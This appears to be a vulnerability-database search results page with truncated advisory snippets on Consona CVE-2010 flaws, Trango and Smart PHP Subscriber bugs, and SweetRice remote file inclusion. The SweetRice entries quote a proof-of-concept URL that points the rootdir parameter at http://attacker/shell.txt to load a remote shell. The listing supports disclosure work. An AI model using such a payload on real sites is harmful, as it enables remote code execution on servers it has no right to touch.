8750 matches found
Default configuration
The default configuration of pluginlicense.ini for the SdcWebSecureBase interface in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance, when downloaded from a server operated by Telefonica or possibly other companies, contains an incorrect DNS whitelist that include...
CVE-2010-1905
Multiple cross-site scripting XSS vulnerabilities in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance allow remote attackers to inject arbitrary web script or HTML via crafted input to ASP pages, as demonstrated using the backurl parameter to...
CVE-2010-1913
The CVE-2010-1913 issue affects the SdcWebSecureBase interface’s tgctlcm.dll used by Consona Live Assistance, Dynamic Agent, and Subscriber Assistance. When plugins/clients are downloaded from a Telefonica-operated server (or similar), its default pluginlicense.ini contains an incorrect DNS white...
CVE-2010-1913
The default configuration of pluginlicense.ini for the SdcWebSecureBase interface in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance, when downloaded from a server operated by Telefonica or possibly other companies, contains an incorrect DNS whitelist that include...
CVE-2010-1910
Consona password-reset vulnerability CVE-2010-1910 affects Consona Live Assistance, Dynamic Agent, and Subscriber Assistance. The Forgot Password feature allows remote reset of accounts with blank Hint questions/answers by submitting empty values for both fields, enabling password changes without...
CVE-2010-1906
The CVE-2010-1906 entry concerns tgsrv.exe in Consona Dynamic Agent components (Repair Service, Repair Manager, Subscriber Activation, Subscriber Agent). The root cause is reliance on a predictable timestamp field to validate input to the named pipe \.\pipe\__RepairService_pipe__company, enabling...
CVE-2010-1909
CVE-2010-1909: Buffer overflow in the RunCmd method of the SdcUser.TgConCtl ActiveX control (tgctlcm.dll) used by Consona Live Assistance, Dynamic Agent, and Subscriber Assistance. This vulnerability permits remote code execution via CreateProcess params. Exploitation details are not fully provid...
CVE-2010-1907
The CVE-2010-1907 entry concerns the SdcUser.TgConCtl ActiveX control in tgctlcm.dll used by Consona Live Assistance, Dynamic Agent, and Subscriber Assistance. The vulnerability allows remote attackers to discover the client user’s username and deduce a path to a user directory via GetUserName. I...
CVE-2010-1908
The SdcUser.TgConCtl ActiveX control in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance does not properly restrict access to the HTTPDownloadFile, HTTPGetFile, Install, and RunCmd methods, which allows remote attackers to execute arbitrary programs via a URL in th...
CVE-2010-1907
The SdcUser.TgConCtl ActiveX control in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance allows remote attackers to discover the username of the client user, and consequently determine a pathname to a certain user directory, via a call to the GetUserName method...
CVE-2010-1905
CVE-2010-1905 concerns multiple cross-site scripting (XSS) vulnerabilities in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance. The XSS can be triggered by crafted input to ASP pages, demonstrated via the backurl parameter to sdccommon/verify/asp/n6plugindestructor.asp. The avail...
Researchers Hijack Cell Phone Data, GSM Locations
A pair of security researchers has discovered a number of new attack vectors that give them the ability to not only locate any GSM mobile handset anywhere in the world, but also find the name of the subscriber associated with virtually any cellular phone number, raising serious privacy and securi...
Trango Broadband Wireless Interception
-------------------------------------------------------------------------- Trango Broadband Wireless M5830 Series Rogue SU Authentication Bug Date : 15 December, 2009 By: Blair - [email protected] -------------------------------------------------------------------------- Background ----------...
Trango Broadband Wireless Rogue SU Authentication Bug
-------------------------------------------------------------------------- Trango Broadband Wireless M5830 Series Rogue SU Authentication Bug Date : 15 December, 2009 By: Blair - [email protected] -------------------------------------------------------------------------- Background ----------...
Smart PHP Subscriber Multiple Disclosure Vulnerabilities
No description provided by source. ----------------------------------------------------------------------------------------------- Title: Smart PHP Subscriber Multiple Disclosure Vulnerabilities Author: Milos Zivanovic Email: milosz.securityatgmail.com Date: 14. December 2009...
Smart PHP Subscriber Disclosure
----------------------------------------------------------------------------------------------- Title: Smart PHP Subscriber Multiple Disclosure Vulnerabilities Author: Milos Zivanovic Email: milosz.securityatgmail.com Date: 14. December 2009...
Smart PHP Subscriber - Multiple Disclosure Vulnerabilities
Smart PHP Subscriber - Multiple Disclosure Vulnerabilities ----------------------------------------------------------------------------------------------- Title: Smart PHP Subscriber Multiple Disclosure Vulnerabilities Author: Milos Zivanovic Email: milosz.securityatgmail.com Date: 14. December...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in SweetRice 0.5.4, 0.5.3, and earlier allow remote attackers to execute arbitrary PHP code via a URL in the rootdir parameter to 1 plugin/subscriber/inc/post.php and 2 as/lib/newsmodify.php...
SweetRice 0.5.0 Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg SweetRice PoC : http://target/path/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...
SweetRice 0.5.3 - Remote File Inclusion
SweetRice 0.5.3 - Remote File Inclusion Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...